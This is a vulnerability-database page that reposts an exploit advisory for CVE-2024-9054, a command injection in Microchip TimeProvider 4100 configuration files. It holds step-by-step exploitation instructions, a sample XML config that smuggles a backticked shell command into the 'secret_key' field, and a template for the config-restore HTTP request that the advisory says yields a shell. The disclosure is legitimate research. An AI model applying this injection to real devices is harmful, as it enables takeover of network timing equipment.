📄 Microchip TimeProvider 4100 Grandmaster 2.4.6 Command Injection

🗓️ 04 Apr 2025 00:00:00Reported by Antonio Carriero, Marco Negro, Manuel Leone, Armando Huesca Prida, Vito Pistillo, Massimiliano Brolli, Davide RennaType

packetstorm🔗 packetstorm.news👁 260 Views

Remote Code Execution vulnerability in Microchip TimeProvider 4100 via configuration file exploit.

Reporter	Title	Published	Views	Family All 11
Circl	CVE-2024-9054	4 Oct 202422:43	–	circl
CNNVD	Microchip TimeProvider 4100 操作系统命令注入漏洞	4 Oct 202400:00	–	cnnvd
CVE	CVE-2024-9054	4 Oct 202419:42	–	cve
Cvelist	CVE-2024-9054 Remote code Execution inTimeProvider® 4100	4 Oct 202419:42	–	cvelist
Exploit DB	Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection	4 Apr 202500:00	–	exploitdb
EUVD	EUVD-2024-49694	4 Oct 202419:42	–	euvd
NVD	CVE-2024-9054	4 Oct 202420:15	–	nvd
OSV	CVE-2024-9054	4 Oct 202420:15	–	osv
Positive Technologies	PT-2024-39392 · Microchip · Timeprovider 4100	4 Oct 202400:00	–	ptsecurity
RedhatCVE	CVE-2024-9054	23 May 202510:39	–	redhatcve

# Exploit Title: Microchip TimeProvider 4100 Grandmaster Config File - Remote Code Execution (RCE)
    
    # Exploit Author: Armando Huesca Prida
    
    # Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli
    
    # Date of Disclosure: 27/06/2024
    
    # Date of CVE Publication: 4/10/2024
    
    # Exploit Publication: 10/10/2024
    
    # Vendor Homepage: https://www.microchip.com/
    
    # Version: Firmware release 1.0 through 2.4.7
    
    # Tested on: Firmware release 2.3.12 
    
    # CVE: CVE-2024-9054
    
    # External References:
    
    # URL: https://www.cve.org/cverecord?id=CVE-2024-9054
    
    # URL: https://0xhuesca.com/2024/10/cve-2024-9054.html
    
    # URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-rce-through-configuration-file
    
    # URL: https://www.gruppotim.it/it/footer/red-team.html
    
    
    
    
    
    # Vulnerability Description:
    
    
    
    A Remote Code Execution (RCE) vulnerability exists in the "secret_key" XML tag in the Microchip TimeProvider 4100 device's configuration file. Once the configuration file containing the malicious payload is loaded by the device, after first attempt of login the payload will execute resulting in remote code execution.
    
    
    
    
    
    # Exploitation Steps:
    
    
    
    1- Perform login into the device's management web interface.
    
    2- Download the device's configuration file.
    
    3- Substitute the "secret_key" value with the malicious payload.
    
    4- Save the new configuration file containing the OS command to be executed.
    
    5- Restore and submit the new configuration.
    
    6- Attempt of login using any active service like SSH/Telnet/Console will trigger the malicious payload.
    
    
    
    
    
    # Example of malicious XML config file:
    
    
    
    <?xml version="1.0"?>
    
    [...]
    
     <security>
    
        [...]
    
    	<server>
    
            	<ip>192.168.1.1</ip>
    
            	<secret_key>`ping 192.168.1.20`</secret_key>
    
            	[...]
    
          	</server>
    
        [...]
    
     </security>
    
    [...]
    
    
    
    # Proof of Concept - PoC:
    
    
    
    Manually modifying the following request it's possible to obtain interactive shell on the vulnerable device. Below is provided the list of values to be updated on the Exploit - HTTP request:
    
    - [session cookie]
    
    - [XML configuration file containing the injection on "secret_key" tag]
    
    - [Web account password in clear-text]
    
    - [device IP]
    
    
    
    
    
    # Exploit - Restore and submit config file HTTP Request:
    
    
    
    POST /config_restore HTTP/1.1
    
    Host: [device IP]
    
    Cookie: ci_session=[session cookie]
    
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
    
    Accept: */*
    
    Accept-Language: en-US,en;q=0.5
    
    Accept-Encoding: gzip, deflate, br
    
    Content-Type: multipart/form-data; boundary=---------------------------182708909322642582691204887002
    
    Content-Length: 206640
    
    Origin: https://[device IP]
    
    Referer: https://[device IP]/configbackuprestore
    
    Sec-Fetch-Dest: empty
    
    Sec-Fetch-Mode: cors
    
    Sec-Fetch-Site: same-origin
    
    Te: trailers
    
    Connection: keep-alive
    
    
    
    -----------------------------182708909322642582691204887002
    
    Content-Disposition: form-data; name="file"; filename="tp4100_cfg.txt"
    
    Content-Type: text/plain
    
    
    
    [XML configuration file containing the injection on "secret_key" tag]
    
    -----------------------------182708909322642582691204887002
    
    Content-Disposition: form-data; name="pword"
    
    
    
    [Web account password in clear-text]
    
    -----------------------------182708909322642582691204887002--
    
    
    
    
    
    # End

04 Apr 2025 00:00Current

7.6High risk

Vulners AI Score7.6

CVSS 3.18.8

CVSS 48.5

EPSS0.24573

SSVC